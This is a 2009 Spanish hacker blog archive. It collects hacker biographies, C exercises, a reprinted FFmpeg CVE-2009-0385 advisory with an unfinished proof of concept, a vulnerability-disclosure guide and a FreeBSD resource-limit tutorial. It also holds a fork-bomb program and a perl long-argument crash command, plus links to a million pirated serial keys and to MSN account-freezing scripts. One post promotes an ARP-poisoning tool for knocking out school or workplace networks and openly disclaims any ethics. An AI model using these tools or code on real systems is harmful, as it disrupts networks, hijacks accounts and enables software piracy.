El Gran Oscarín hacker español de 27 años, autor del troyano Cabronator, las iniciales son O.L.H y que en los primeros días de Abril del 2003 fue detenido por la Guardia Civil de Española, en un operativo denominado CLON que se inició en Agosto del 2002. Su impresionante ego está casi a la par con sus prolíficas creaciones de todas sus herramientas de hacking y cracking, virus, juegos obscenos, etc. Lycos Mail Anegator "...Bombardea cuentas de lycos a base de e-mails. MSN-Phuk "...Carga cuentas de Hotmail ajenas"Psecreta "Lo que hace es averiguar la pregunta secreta que ponen los capullos de los usuarios de HOTMAIL "O-MaiL 1.00: ..."Programa para enviar e-mails anónimos a la basca"Chivator Con este programa puedes ver qué se esconde bajo esos misteriosos ******* que ponen los programas l3ims en sus contraseñasBOMBITA: ..."es un programa de envío masivo de e-mails"ANONIMIZAME: ..."Un programa que configura tu Internet Explorer para que navegues por internet de forma ANÓNIMA bajo un proxy"


Tsutomu Shimomura Shimomura buscó lo encontró y desenmascaro a Kevin Mitnick, el cracker/phreaker más famoso de USA, a principios de 1994. Después de que sus colegas del "San Diego Supercomputing Center" le informaron a Shimomura que alguien había robado centenares de programas y los ficheros de su estación de trabajo, el experto en seguridad computacional Tsutomu trabajó en extremo para seguir al ladrón a través del "WELL". Un rastro del "telco labyrinthine" lo condujo eventualmente a un complejo en Raleigh, N.C donde más tarde los agentes de FBI arrestarían a Mitnick en su departamento. Pero eso no fue todo, Shimomura fue el consultor del FBI, la fuerza aérea y de la agencia de la seguridad nacional (NSA). se rumorea que Shimomura era parte del lado oscuro del hacking. ya que si no ¿por que hizo un programa para escuchar las llamadas de teléfonos celulares? ¿No les suena de alguna manera como una treta de la NSA?


Justin Frankel comenzó cuando en 1.999, con apenas 19 años de edad vendió su empresa NullSoft, propietaria de WinAmp, a AOL por 100 millones de dólares.Durante ese tiempo y ya trabajando bajo las órdenes de AOL, Frankel, con 25 años en la actualidad, ha sido el artífice de la red descentralizada Gnutella, del sistema de streaming Shoutcast y del programa de pares Waste, lo cual y según la revista Rolling Stone le ha hecho merecedor del título del "Geek más peligroso del mundo". Mientras trabajaba bajo las órdenes de AOL, Frankel creó Gnutella, la primera red de pares descentralizada del mundo, que colgó en uno de los servidores de la compañía cogiendo a todo el mundo por sorpresa.A las pocas horas el programa fue retirado, pero había dado tiempo suficiente de que miles de personas lo descargaran y aprendiesen de su código fuente.Sin ningún género de dudas, Frankel es un programador prodigioso, pero demasiado incómodo para trabajar a las órdenes de una compañía como AOL. Ahora, libre y con dinero suficiente como para tan no tener que preocuparse en ganarlo, puede ser una auténtica bomba de relojería.


Ray Tomilson Hace treinta y dos años en 1971, Ray Tomlinson, un joven ingeniero de la firma Bolt Beranek and Newman (encargada de construir la Arpanet, la red de computadoras precursora de la Internet),se puso a trabajar en el desarrollo del SNDMSG, un programa para enviar mensajes a usuarios de una misma computadora. Tomlinson estaba experimentando con un programa que había escrito, el CPYNET, que permitía transferir archivos entre computadoras (en ese entonces, la Arpanet consistía de 23 computadoras en 15 sitios de los Estados Unidos). Se le ocurrió que así como alguien podía enviar un mensaje a un usuario de la misma computadora, también debería poder hacerlo con los científicos que usaban equipos en todo el país. Ese día fue cuando decidió incorporar al CPYNET en el SNDMSG (en total, unas 200 líneas de código) para que todos pudieran agregar texto al archivo-casilla de cualquier usuario de la Arpanet. Tomlinson quería diferenciar el nombre del usuario de la computadora en la que trabajaba, y eligió la arroba @, que en inglés significa at (en tal lugar). El signo tenía poco uso en ese entonces, y no se confundía con otras instrucciones. Una vez que ajustó el funcionamiento del software, Tomlinson le envió un mensaje a sus colegas, promocionando el sistema. Fue un pequeño éxito. Todos los que tenían acceso a la red comenzaron a usarlo. Dos años después, el 75% del tráfico de la Arpanet correspondía al e-mail. Hoy se envían 2100 millones de mensajes por día.

Fuente http://new.taringa.net/posts/1606796

--
- Anon

martes, 31 de marzo de 2009

[C] digit "Determinacion si un caracter es Digito o no"

6.1 Escriba una función dígito que determine si un carácter es uno de los dígitos 0,1,2,...9.

En la librería ctype.h se encuentra ya esa función pre programada como isdigit()

Descargar digit.c 224 B

#include<stdio.h>
#include<ctype.h>
 
int main() {
  char c;
 printf("Ingrese un digito: ");
  if(isdigit(getchar())) {
   printf("\nSi es digito!\n");
  }
 else {
  printf("\nNo es digito!\n");
  }
 return 0;
}

Ahora aqui la muestra con una función tal y como dice el ejercicio en este ejemplo con if

Descargar digit01.c 322 B

#include<stdio.h>
  
int esdigito(int);
 
int main() {
  char c;
 printf("Ingrese un digito: ");
  if(esdigito(getchar())) {
   printf("\nSi es digito!\n");
  }
 else {
  printf("\nNo es digito!\n");
  }
 return 0;
}
 
int esdigito(int c) {
  if(c>= '0' && c<= '9')
   return 1;
 else
  return 0;
 }

Y Ahora lo mismo pero en lugar de if seria Operador Ternario

Descargar digit02.c 300 B

#include<stdio.h>
 
int esdigito(int);
  
int main() {
 char c;
  printf("Ingrese un digito: ");
  if(esdigito(getchar())) {
   printf("\nSi es digito!\n");
  }
 else {
  printf("\nNo es digito!\n");
  }
 return 0;
}
 
int esdigito(int c) {
  return (c>= '0' && c<= '9') ? 1 : 0;
 }

Creo que es posible hacerlo con Expresiones regulares, sin embargo en mi opinión y para este caso seria lo mas optimo que se puede escribir la función.

Saludos

--
- Anon

sábado, 21 de marzo de 2009

Revistas HackxCrack

Hola que tal he agregado un mirror a estas revistas, espero y les sirvan.

HrackxCrack

Saludos

--
- Anon

[ES] CVE-2009-0385 mas detalles

Me he comunicado con Tobias Klein para pedir un mas detalles sobre la prueba de concepto para el bug descrito en el CVE-2009-0385, su comentario fue el siguiente

The vulnerability is 100% exploitable to execute arbitrary code. See http://tk-blog.blogspot.com/2009/01/exploitable-userland-null-pointer.html.

Tobi

Segun describe en su blog, logro confirmar la vulnerabilidad y controlar el EIP tanto en windows y opensuse.

El tiene un PoC, no le comente nada sobre el, mas que nada le pregunte sobre la estructura 4xm.

Tambien me he comunicado con Mike Melanson que al parecer hace tiempo que no hablar el tema del formato de los archivos 4xm su cometario fue el siguiente


What exactly are you trying to accomplish? I don't have all the details of the 4xm format fresh in my mind. All of my knowledge is written down in either that document, or the FFmpeg demuxer (I also wrote the xine 4xm demuxer).

Buscando sobre ello encontré con la pagina de la discusión de la vulnerabilidad

http://bugs.xine-project.org/show_bug.cgi?id=205

Ahi comenta que xine-lib tiene un problema similar al descrito por Tobias que lo discute en su blog

http://tk-blog.blogspot.com/2009/02/tkadv2009-004-vs-xine-lib.html

Bueno con esto ya tengo en mente que la vulnerabilidad del CVE-2009-0385 es explotable, espero terminar de entender el formato 4xm para poder terminar el PoC que la verdad es muy simple

Saludos
--
- Anon

[EN] CVE-2009-0385 more details

I contacted Tobias Klein asked for a more details on the proof of concept for the bug described in CVE-2009-0385, his comment was as follows

The vulnerability is 100% exploitable to execute arbitrary code. See http://tk-blog.blogspot.com/2009/01/exploitable-userland-null-pointer.html.

Tobi

As described in his blog, an achievement confirmed the vulnerability and control the EIP in windows and opensuse.

The PoC has not told her anything about him, more than anything you ask about the structure 4xm.

I have also communicated with Mike Melanson who apparently does not speak while the issue of the format of your files cometary 4xm was as follows

 What exactly are you trying to accomplish? I do not have all the details of the format 4xm fresh in my mind. All of my knowledge is written down either in that document, or the FFmpeg demuxer (I also wrote the xine demuxer 4xm).

Searching on this page to find the discussion of vulnerability

http://bugs.xine-project.org/show_bug.cgi?id=205

There he says that xine-lib has a problem similar to that described by Tobias discusses in his blog

http://tk-blog.blogspot.com/2009/02/tkadv2009-004-vs-xine-lib.html

Well I already have in mind the vulnerability CVE-2009-0385 is usable, I hope to understand format complete 4xm order to complete the PoC that truth is very simple

Regards

--
- Anon

viernes, 20 de marzo de 2009

[Python] ItMsnProtocol (Project)

Creado por Erik#
El script para desbloquearse esta genial.

Saludos



ItMsnProtocol Project

¿Que es?
Son unos scripts python de código abierto que usando la libreria msnp pueden crear diferentes sistemas de utilización.

Actuales scripts:
Actualmente, estamos creando FreezItMsn y ByPassItMsn.

FreezItMsn:
Es un script que mediante un cierto tiempo, cuestion de segundos, congela la cuenta de messenger, no permite abrir al usuario su cuenta, le da error.

ByPassItMsn:
Es un script que mediante un cierto tiempo, cuestion de segundos, inhabilita las congelaciones a tu cuenta.

Descargas:
Pack completo: http://krews.es/ItMsnProtocol.zip

A qui pongo un mirror parece que el sitio original esta ya caido:

http://cid-4d0c9dba4e99e162.skydrive.live.com/self.aspx/.Public/src/ItMsnProtocol.zip

--
- Anon

jueves, 19 de marzo de 2009

Cafeshito: Futura aplicación para Cybers.

CAFESHITO es una aplicacion para administrar, controlar, mediar el tiempo de consumo de los equipos de
computo conectados a la red del cybercafe, ya sean equipos conectado a la red local o equipos conectados
a la red inalambrica. CAFESHITO es una aplicacion de software libre desarrollada principalmente para los cybercafes que desean
aventurarse en la implementacion de redes monitoreadas de cybercafe sbre GNU/Linux.

CAFESHITO es un proyecto de software desarrollado por el grupo de programadores perteneciendes a la empresa
de seguridad informatica y desarrollo de software SIE-Group. SIE-Group es una empresa que patrocina y
desarrolla proyectos innovadores utiles para los usuarios.

CAFESHITO es un proyecto emprendido el 10 de Marzo del 2009 por el M.S.I Angel Cantu (Diabliyo) y como aun
es una version 'inestable' y en desarrollo, la pagina del proyeto esta abierta a propuestas, colaboraciones
o incorporacion de gente programadora interesada, para mayor informacion visitar el sitio.

Web del Proyecto:
---> http://cafeshito.sie-group.net/ <---

--
- Anon

miércoles, 18 de marzo de 2009

More than 1 million and Serial Key and Freeware Software

More than 1 million and Serial Key of Freeware and Software 2007-2008

Millon_Keys.txt.bz2

Regards



Mas de 1 millon  de Serial Key y Claves de Freeware y Software 2007-2008

Millon_Keys.txt.bz2

Saludos

--
- Anon

CVE-2009-0385: FFmpeg Type Conversion Vulnerability

Original Advisory

http://www.trapkit.de/advisories/TKADV2009-004.txt


Citar
==================
Technical Details:
==================

Source code file: libavformat/4xm.c

[..]
 93 static int fourxm_read_header(AVFormatContext *s,
 94                               AVFormatParameters *ap)
 95 {
 ..
103 [8]  int current_track = -1;
 ..
106 [9]  fourxm->track_count = 0;
107 [10] fourxm->tracks = NULL;
 ..
160      } else if (fourcc_tag == strk_TAG) {
161          /* check that there is enough data */
162          if (size != strk_SIZE) {
163              av_free(header);
164              return AVERROR_INVALIDDATA;
165          }
166 [1]      current_track = AV_RL32(&header[i + 8]);
167 [2]      if (current_track + 1 > fourxm->track_count) {
168             fourxm->track_count = current_track + 1;
169             if((unsigned)fourxm->track_count >= UINT_MAX /
                           sizeof(AudioTrack))
170               return -1;
171 [3]         fourxm->tracks = av_realloc(fourxm->tracks,
172                 fourxm->track_count * sizeof(AudioTrack));
173             if (!fourxm->tracks) {
174               av_free(header);
175               return AVERROR(ENOMEM);
176             }
177         }
178 [4] fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);
179 [5] fourxm->tracks[current_track].channels = AV_RL32(&header[i + 36]);
180 [6] fourxm->tracks[current_track].sample_rate = AV_RL32(&header[i+40]);
181 [7] fourxm->tracks[current_track].bits = AV_RL32(&header[i + 44]);
[..]

[1] The signed int variable "current_track" (see [8]) is filled with user
    supplied data from the media file
[2] This statement checks if the user controlled value of "current_track"
    is greater than "fourxm->track_count". The variable "fourxm-
    >track_count" is initialized with 0 (see [9]). By supplying a value >=
    0x80000000 for "current_track" it is possible to cause a change in sign
    that results in "current_track" being negative. If "current_track" is
    negative, the if statement will always return false and the buffer
    allocation in [3] will never be reached.
[4] As "fourxm->tracks" is initialized with NULL (see [10]) and line 171 is
    never reached this leads to an exploitable NULL pointer dereference. It
    is possible to write 4 bytes of user controlled data to the memory
    location "NULL + current_track". As the value of "current_track" is
    also controlled by the user it is possible to write 4 bytes of
    arbitrary data at a wide range of memory addresses.
[5] See [4]
[6] See [4]
[7] See [4]

A malicious party may exploit this issue to execute arbitrary code by
overwriting a sensitive memory location (such as a GOT/IAT entry, a return
address, buffer length or boolean variable).


Afecta a algunos reproductores como xine Mplayer entre otros, Según yo solo podremos crear un DoS pero seria de ver.

Ya hay parche pero dudo que los linuxeros (Comunes) estén parcheando cada una de las vulnerabilidades que salen...

Bueno, he tratado de crear un PoC para la vulnerabilidad sin embargo no lo he logrado, tengo un archivo 4xm que según yo debería de funcionar o por lo menos eso creo.

Al parecer no he comprendido muy bien el formato de los los archivos 4xm.

El formato 4x Movie esta descrito aqui:
http://multimedia.cx/4xm-format.txt

Citar
4xm files appear to have the following general structure:

  RIFF header
    LIST-HEAD chunk
      LIST-HNFO chunk
    LIST-TRK_ chunk
      LIST-VTRK chunk
      LIST-STRK chunk
      [..more tracks..]
    LIST-MOVI chunk
      LIST-FRAM chunk
      LIST-FRAM chunk
      LIST-FRAM chunk
      [..more frame tracks..]

tengo duda de LIST-HNFO ya que de este no esta entre las decalaraciones de los Tag de la libreria:

libavformat/4xm.c

Código
#define  RIFF_TAG MKTAG('R', 'I', 'F', 'F')
#define _4XMV_TAG MKTAG('4', 'X', 'M', 'V')
#define  LIST_TAG MKTAG('L', 'I', 'S', 'T')
#define  HEAD_TAG MKTAG('H', 'E', 'A', 'D')
#define  TRK__TAG MKTAG('T', 'R', 'K', '_')
#define  MOVI_TAG MKTAG('M', 'O', 'V', 'I')
#define  VTRK_TAG MKTAG('V', 'T', 'R', 'K')
#define  STRK_TAG MKTAG('S', 'T', 'R', 'K')
#define  std__TAG MKTAG('s', 't', 'd', '_')
#define  name_TAG MKTAG('n', 'a', 'm', 'e')
#define  vtrk_TAG MKTAG('v', 't', 'r', 'k')
#define  strk_TAG MKTAG('s', 't', 'r', 'k')
#define  ifrm_TAG MKTAG('i', 'f', 'r', 'm')
#define  pfrm_TAG MKTAG('p', 'f', 'r', 'm')
#define  cfrm_TAG MKTAG('c', 'f', 'r', 'm')
#define  ifr2_TAG MKTAG('i', 'f', 'r', '2')
#define  pfr2_TAG MKTAG('p', 'f', 'r', '2')
#define  cfr2_TAG MKTAG('c', 'f', 'r', '2')
#define  snd__TAG MKTAG('s', 'n', 'd', '_')
 

Por lo cual dudo de su existencia, el PoC que hice esta usando dicha LIST pero al parecer el programa dentro del codigo no lo toma en cuenta, voy a seguir probando para generar un PoC que funcione:

Aqui esta el que cree 4xm_evil.4xm

El código en C con el cual lo cree esta bien raro, por lo cual mejor prefiero ordenarlo un poco mas y liberarlo.

Espero y les interese, Saludos.

--
- Anon

martes, 17 de marzo de 2009

[Cadena] Credo del Programador

Creo en un solo lenguaje de programación, "C" Todopoderoso
Creador de UNIX y de Windows
Creo en un solo "C++",
hijo único de "C" Nacido de "C" antes de "Visual C++"
"C" de "C", Compilador de Compilador,
"C"(c) copyrighted, Compilado, no interpretado,
de los mismos programadores que el Padre
por quien todo es programado,
que por nosotros los hombres y nuestros servidores
fue desarrollado
y por obra del Lenguaje Binario se encarnó en
ensamblador y se hizo Lenguaje
y por nuestra causa
es ampliamente aceptado en tiempos de Bill Gates.
Decayó y fue olvidado y se renovó al tercer día,
según los usuarios.
Y subieron las ventas, y esta ubicado dentro de todo UNIX
Por quien todo es programado
Y de nuevo vendrá mejorado para juzgar a virus y programas
Y su dominio no tendrá fin.
Creo en el lenguaje binario, código y base del sistema
Que precede al padre y al hijo. Que con el padre y el hijo
recibe una misma aplicación y memoria
y que habló por los procesadores...
Creo en la arquitectura IBM, que es una, sólida, compacta y compatible.
Confieso que no hay ni un solo "undo" para la corrección de los errores
Espero la resurrección de las Macs y la vida en un mundo con Internet...

Enter



--
- Anon

domingo, 15 de marzo de 2009

I need beta-testers 4 tequiLAN: simple tool a DoS on LAN

Bueno, escribo esto para solicitar su ayuda testear la herramienta que he creado "tequiLAN".

¿Que es tequiLAN?
Es una herramienta creada mediante libnet y libpcap, genera un DoS en la LAN utilizando ARP Poison.

¿Como lo hace?
A cada petición ARP-REQUEST que llege al NIC y que no tenga nuestra dirección IP Responde con un ARP-REPLY con la IP Pedida y una MAC Aleatoria.

Esto como la mayoría ya sabrá y ha experimentado con herramientas como nemesis, arpspoof entre otras, nos puede generar un DoS o si lo aprovechamos podremos crear un redirector de trafico hacia nuestra NIC sin embargo esos ya existen y pues no quiero reinventar la rueda.

¿Usos principales?
Pues si estamos en la escuela y no queremos hacer un examen Online o parecido pues simplemente podremos tumbar la red.
O igual si nos queremos dar un tiempo en el trabajo pues también lo usamos.

¿Ética?
Ninguna es una herramienta totalmente fuera de ética, solo lo programe por programarlo. Así que si alguien quiere comentar sobre mis intenciones o las implicaciones que pueda tener pues que me lo mande por PM y no aquí.



Archivo: tequiLAN_0.1.tar.bz2.gpg

Efecto sobre el router:



Consumo de Recursos al Reservar memoria para Equipos inexistentes

Efecto sobre las victimas:



DoS

Apariencia de la salida




Cosas que hay que testear

Utilidad del Makefile
¿Se necesitan cambios?
¿Otra organización?

Sugerencias para mejorar funciones, estructuras, compatibilidad, rendimiento, Licencia etc.

Bueno si alguien quiere ayudar a testear la librería, que me mande un correo y le paso el password.

Saludos

--
- Anon

jueves, 12 de marzo de 2009

publicado flv2mpeg4

Bueno, pues simple, ya fue publicado el mensaje de flv2mpeg4: Malformed parameters Denial of Service en securityfocus

http://www.securityfocus.com/archive/1/501704/30/0/threaded

haha no pensé que el error lo publicaran por el hecho de ser un error menor y además solo lo publique para ejemplificar como se podría dar el reporte de una vulnerabilidad, ya que anteriormente lo había mandado a milw0rm y me comentaron que no encajaba por el hecho de no poder escalar privilegios.



Saludos.

--
- Anon

Torneo de elevación de privilegios en WarZone (Torneo_Root)

Se ha hecho un torneo nuevo de elevación de privilegios llamado Torneo_Root.

El objetivo, es obtener root en el servidor, por cualquier manera posible.

Va a estar online por 1 mes exactamente

El primero que lo logre tendra puntos extra y una cuenta @elhacker.net con acceso a todos sus servicios.

Se daran puntos extras por cualquier vulnerabilidad local en el sistema que afecte la integridad del torneo.

Los detalles estan en:
http://warzone.elhacker.net/pruebas.php?p=56

Obtienen su login en el servidor en:
http://warzone.elhacker.net/wzon.php

Se conectan por SSH al puerto 22 (para usuarios de windows pueden usar PuTTy).

Fue hecha con la colaboración de hackbsd.org

Diviertanse!!

Saludos!!

--
- Anon

miércoles, 11 de marzo de 2009

Get codes and passwords unprotected program

This is a simple example of how it could violate an application to request password or keys, and that is not protected.

The example of the application binary that would be the following code:

easyKey.c
Código
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
 
char *password = "A9D6B4C3E2F1";
 
int main(int argc, char **argv) {
if(argc == 2) {
if(strncmp(password,argv[1],strlen(password) ) == 0)
printf("ok\n");
else
printf("no\n");
}
else {
printf("Use:\n\t%s <key>\n",argv[0]);
}
return 0;
}
 
 

After compile and run:

Código
Anon@localhost % gcc -o easyKey easyKey.c
Anon@localhost % ./easyKey
Use:
   ./easyKey <key>
Anon@localhost % ./easyKey xD
no
Anon@localhost % ./easyKey 1234
no
 

Can see that the code "key" we can get using the strings that come in most Unix environments

Código:
Anon@localhost % strings easyKey
/libexec/ld-elf.so.1
FreeBSD
_Jv_RegisterClasses
libc.so.7
printf
puts
environ
__progname
strncmp
_init_tls
atexit
strlen
_end
FBSD_1.0
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $
A9D6B4C3E2F1
Use:
    %s <key>
$FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:31:06 dfr Exp $
Anon@localhost % ./easyKey A9D6B4C3E2F1
ok

I hope and will help you someday.

Regards

--
- Anon

martes, 10 de marzo de 2009

Conseguir Codigos y contraseñas de programas desprotegidos

Este es un ejemplo sencillo de como se puede llegar a vulnerar una aplicación que pida serial o password y que no este protegida.

El ejemplo de la aplicación seria el binario que resulte del siguiente código:

easyKey.c

Código
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
 
char *password = "A9D6B4C3E2F1";
 
int main(int argc, char **argv) {
if(argc == 2) {
if(strncmp(password,argv[1],strlen(password) ) == 0)
printf("ok\n");
else
printf("no\n");
}
else {
printf("Use:\n\t%s <key>\n",argv[0]);
}
return 0;
}
 
 

Despues de compilarlo y ejecutarlo:

Código
Anon@localhost % gcc -o easyKey easyKey.c
Anon@localhost % ./easyKey
Use:
   ./easyKey <key>
Anon@localhost % ./easyKey xD
no
Anon@localhost % ./easyKey 1234
no
 

Podremos observar que dicho codigo "key" lo podemos obtener mediante la utilidad strings que viene en la mayoría de los Entornos Unix

Código:
Anon@localhost % strings easyKey
/libexec/ld-elf.so.1
FreeBSD
_Jv_RegisterClasses
libc.so.7
printf
puts
environ
__progname
strncmp
_init_tls
atexit
strlen
_end
FBSD_1.0
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $
A9D6B4C3E2F1
Use:
    %s <key>
$FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:31:06 dfr Exp $
Anon@localhost % ./easyKey A9D6B4C3E2F1
ok

Espero y les sirva algún día.

Saludos

--
- Anon

[FreeBSD] "Login Class" Limites y Clases para los Usuarios

Bueno para que no se confundan desde ahorita, no me estoy refiriendo a los clásicos grupos del sistema UNIX, ya que generalmente estos solo nos dan restricciones sobre direcctorios y procesos que se nos permiten ejecutar, pero que hay de restringir el uso de la memoria o del CPU, Numero de Processos etc.

Dentro de FreeBSD el archivo /etc/login.conf nos permite gracer nuevas clases de usuarios para ajustar estos niveles de restricciones.

Por defecto el sistema nos coloca en default:

default:\
        :passwd_format=blf:\
        :copyright=/etc/COPYRIGHT:\
        :welcome=/etc/motd:\
        :setenv=MAIL=/var/mail/$,BLOCKSIZE=K,FTP_PASSIVE_MODE=YES:\
        :path=/sbin /bin /usr/sbin /usr/bin /usr/games /usr/local/sbin /usr/local/bin /usr/X11R6/bin ~/bin:\
        :nologin=/var/run/nologin:\
        :cputime=unlimited:\
        :datasize=unlimited:\
        :stacksize=unlimited:\
        :memorylocked=unlimited:\
        :memoryuse=unlimited:\
        :filesize=unlimited:\
        :coredumpsize=unlimited:\
        :openfiles=unlimited:\
        :maxproc=unlimited:\
        :sbsize=unlimited:\
        :vmemoryuse=unlimited:\
        :priority=0:\
        :ignoretime@:\
        :umask=022:

Como podremos ver esa clase de usuarios no tiene restriccion sobre los recursos.

Por describir un ejemplo real que he usado al momento de configurar el servidor para "Torneo Shell" en el warzone de elhacker.net.

Cree un clase de usuario llamada "Warusers" con lo cual limitaba los recursos del servidor el codigo es el siguiente:

warusers:\
       :copyright=/etc/COPYRIGHT:\
       :welcome=/etc/motd:\
       :setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
       :path=~/bin /bin /usr/bin /usr/local/bin:\
       :manpath=/usr/share/man /usr/local/man:\
       :nologin=/var/run/nologin:\
       :cputime=10m:\
       :datasize=8M:\
       :vmemoryuse=80M:\
       :stacksize=2M:\
       :memorylocked=4M:\
       :memoryuse=8M:\
       :filesize=8M:\
       :coredumpsize=1M:\
       :openfiles=48:\
       :maxproc=64:\
       :priority=0:\
       :umask=077:\
       :ignoretime@:

Con estas opciones podremos indicar hasta un archivo motd diferente para cada tipo de usuarios que tengamos en nuestro sistema. Limitamos cosas como el tiempo del CPU, la memoria, el Uso del Disco duro, Numero de procesos en ejecucion etc.

Anteriormente había colocado el tema de Fun D.o.S. local on a Unix system poorly managed con el cual generabamos una Denegacion de Serivicio al equipo por el hecho de consumir los procesos, esta es la solucion el campo maxproc especificamos el numero de procesos maximo lo cual nos daria cierta cantidad mas de control sobre el sistema otra muy recomendable es el opendiles la cual tambien es muy limitante sobre lo que pueden o no pueden hacer los usarios, el punto donde se especifica el login class a los usuarios es con el comando pw el cual podremos modificar la clase del usuario en cuestion y podre asi tener control sobre los recursos.

Espero y les sea de su ayuda.

Saludos
--
- Anon

[Tools] Microsoft Visual C++ Toolkit 2003

Bueno programaba en C/C++ bajo windows una de las herramientas propias de microsoft era el Toolkit de Microsoft Visual C++ 2003 hera una herramienta a mi punto de vista buena, el compilador en linea cl tenia muchas opciones similares a las que tiene el gcc de unix, sin embargo esta herramienta fue sustituida por una mas pesada me refiero al Microsoft Visual Toolkit 2005 creo y la versión anterior dejo de estar disponible, es por ello que la he vuelto a subir para que la puedan descargar si es que la están buscando.

Descargar VCToolkitSetup.exe

MD5 (VCToolkitSetup.exe) = 90d8b963ca196aa9855b2ca6c3174c14
SHA1 (VCToolkitSetup.exe) = 50dc6cca1503f08a41d56816f3f1abcaf347b0bd

Pesa 31 Megabytes el instalador sin embargo una vez instalado pesa mucho mas, instala una versión vieja del Microsoft .NET Framework 1.1

Sirve muy buen para compilar pequeñas aplicaciones con un C estandar.

Espero y les sea de utilidad.

Saludos.
--
- Anon

lunes, 9 de marzo de 2009

[tools] nc11nt.zip Netcat 1.1 para Windows

En repetidas ocasiones he visto que se seguido se pide dicha herramienta y muchas veces no es encontrada fácilmente.

Archivo: nc11nt.zip.gpg
Password: TevP6y9OSzSHQD
MD5 (nc11nt.zip.gpg) = 321886e9c17c0065b439490febceb224
SHA1 (nc11nt.zip) = c8812f5cb4e9d51280c25587ff0f58345c1b171f

Archivo: nc11nt.zip
MD5 (nc11nt.zip) = ec23eb106197f0616a7b2b5556ad72bd
SHA1 (nc11nt.zip) = c8812f5cb4e9d51280c25587ff0f58345c1b171f

Archivo: nc.exe
MD5 (nc.exe) = e0fb946c00b140693e3cf5de258c22a1
SHA1 (nc.exe) = 57f0839433234285cc9df96198a6ca58248a4707

Muchas veces es borrada por descuido ya que se teme que sea un virus o similar.

El uso de esta herramienta va de todos tipos desde administrativos, didacticos, es cliente multinacional, sirve en la mayoría de los protocolos de TCP/IP

Espero y les sirva.

Saludos

--
- Anon

Fun D.o.S. local on a Unix system poorly managed

DoS_Local_fork.c

El siguiente código en C genera múltiples procesos, esto causa una Denegación de Servicio en un sistema mal administrado.

Código
int main()	{
while(1)
fork();
}

existen distintas maneras de protegerse de este código o "vulnerabilidad", todo depende del sistema que estés usando.

Agregare la de FreeBSD después.

Saludos.

--
- Anon

domingo, 8 de marzo de 2009

Como reportar vulnerabilidades

Ya sea que encontremos un bug/error de pura casualidad o investigación y logremos detallar los pasos de como lo descubrimos y/o realizamos en ese momento podremos dar reporte a la falla.

  • El primer paso es delimitar el alcance de la falla.
Verificamos si es la ultima versión del software ya que si no es así o si existen actualizaciones que no tengamos puede que demos con una falla vieja, esta puede o no puede estar reportada.

Dependiendo de esto ultimo procederemos o no y trataremos de ver si versiones anteriores son vulnerables también.
  • Medir el impacto de la falla
Aqui determinamos el impacto de la falla sobre el sistema que la hospeda, entre los mas comunes tenemos:

Denegación de Servicio
Es el mas común, generalmente no pasaremos de hacer que la aplicación deje de funcionar

Consumo de recursos
Si no deja de funcionar, podremos causar algún consumo adicional de memoria y/o microprocesador

Ejecución de Código
Es lo que se busca en la mayoría de las veces, si logramos insertar código y ejecutarlo el sistema podría estar totalmente comprometido

Revelado de información
En dado caso podríamos revelar información que se supone que no deberíamos de poder ver.

Algun Error menor
Se podría dar la situación en la simplemente sobrescribamos alguna variable menor. Solo por mencionar algún ejemplo.

  • Encontrar el medio de comunicación con el creador del software (vendor)
Esto es mas importarte. La mayoría de los software que son públicos tienen un correo/pagina de contacto. Es importante comunicarte con el vendor y darle detalles de la falla que encontraste los pasos que seguiste, y si puedes da sugerencias para mejorar el software.

  • Arreglado/Corregido
Después de Intercambiar algunos correos y ver que el bug sea arreglado y este disponible un parche o nueva versión ahora si es posible publicar el bug en un blog/web propios y posteriormente publicarlo en alguna pagina como securityfocus, milw0rm entre otras.

Cabe mencionar que muchas veces el bug no sera parcheado o puede tardar mucho.




Formato sugerido para el reporte de bug

Generalmente estos se reportan en texto plano.
La mayoría de lista de correo esperan no mas de 80 caracteres por fila.
Organización y Secciones recomendadas
  • Limitación
  • Descripción del Software
  • Descripción del Problema
  • Impacto
  • Solución
  • Referencias
  • Créditos

La organización de dichas secciones puede variar y por su puesto que estas se reportan en ingles.

--
- Anon

flv2mpeg4: Malformed parameters Denial of Service

flv2mpeg4bug.txt.asc

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
Sun Mar 8 21:06:34 CST 2009 Heuristics and Exploiting Vulnerabilities
elhacker.net

Topic: flv2mpeg4: Malformed parameters Denial of Service

======================================================================

Table of Contents

1- Affected Software.
2- Background.
3- Problem Description.
4- Severity
5- Solution
6- Time Table
7- Credits
8- About elhacker.net

======================================================================
1) Affected Software

flv2mpeg4 v1.1

Prior versions may also be affected.

======================================================================
2) Background

flv2mpeg4 allows you convert a Flash Video / FLV file (YouTube's videos,etc)
to MPEG4 (AVI/MOV/MP4/MP3/3GP) file online. It is using a compressed domain
transcoder technology (outline in Japanese). It converts FLV to MPEG4 faster
and less lossy than a typical transcoder.

http://www.freebsd.org/cgi/url.cgi?ports/multimedia/flv2mpeg4/pkg-descr

======================================================================
3) Problem Description

As we can see flv2mpeg4 receives 2 parameters the first is expected to be
a flv file and second mpeg4 (AVI/MOV/MP4/MP3/3GP), the problem is a clerical
error in the parameters or a parameter poorly trained, causing the
application to stop running unexpectedly

for example:

Anon@localhost % flv2mpeg4 Video.flv Video.mpg
Segmentation fault (core dumped)

in this mpg extension is incorrect

Anon@localhost % flv2mpeg4 Video.flv `perl -e '{print "A"x4000,".avi"}'`
Segmentation fault (core dumped)

Although the extension is correct in this case, does not allow such a long
file name

======================================================================
4) Severity

Rating: Very low risk
Impact: Denial of service
Where: Local

======================================================================
5) Solution

Run flv2mpeg4 done correctly with the parameters in order

======================================================================
6) Time Table

22/12/2008 - Vendor notified.
23/12/2008 - Vendor response.
08/03/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Anon, elhacker.net

======================================================================
8) About elhacker.net

Overall objective of the forum elhacker.net
Promote research and encourage the dissemination of knowledge by providing
a means of information, protecting and fighting for their freedom.

Subforum Heuristics and exploitation of vulnerabilities.
Following the overall objective of the forum, subforum Heuristics and
